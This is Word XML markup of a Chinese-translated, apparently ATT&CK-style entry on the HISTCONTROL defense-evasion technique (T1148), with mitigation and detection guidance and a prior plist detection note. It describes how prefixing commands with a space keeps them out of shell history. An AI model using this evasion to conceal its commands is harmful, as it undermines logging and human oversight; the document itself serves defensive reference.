    <w:p w14:paraId="32B30D56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A137197" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">Plist </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件是具有特定格式的</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文本文件，因此它们相对容易分析。文件监视可以检查</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> apple.awt.UIElement </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>或任何其他可疑的</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>标记，并标记它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F95D0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>HISTCONTROL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9736"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="5E3F98C3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5773F2EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00773E5A">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:t xml:space="preserve"> T1148</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163B25EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="762A8E92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00773E5A">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AC6DF3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00773E5A">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4702E74E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00773E5A">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，认证日志，文件监控，环境变量</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557087FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002E0AB6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00773E5A">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机司法分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="591D908F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:r w:rsidRPr="002E0AB6">
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48D45060" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141C3D0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HISTCONTROL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>环境变量跟踪由历史记录命令保存的内容，并在用户注销时最终保存到</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。此设置可以配置为忽略以空格开头的命令，只需将其设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>忽略空格</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。。还可以通过将重复命令设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>忽略</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，将其设置为忽略重复的命令。在某些</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统中，默认情况下，这一点设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>忽略两者</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，这涵盖了前面的两个示例。这意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"ls"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将不</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>会保存，但</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"ls"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将被历史记录保存。默认情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HISTCONTROL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但用户可以设置并受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>保护</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。攻击者只需预先将空间预置到其所有终端命令，即可使用此操作而无需留下痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F152F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="8044"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="1F5CBCFB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4CBC7069" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="743138CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="7B2F9844" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43CABF20" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00773E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>环境变量权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54131593" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁止用户修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HISTCONTROL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>环境变量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="6699527F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF1702C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00773E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28693169" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00773E5A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确认</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HISTCONTROL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>环境变量被设置为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">"ignoredup" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>而不是</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">"ignoreboth" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或者</w:t>
            </w:r>
            <w:r>
              <w:t>"ignorespace"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22FECBAC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D850CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA01DEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="003F5A24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将用户会话与其</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中明显缺少新命令相关联可能是可疑行为的线索。此外，用户检查或更改其</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HISTCONTROL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行为</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A86D40" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
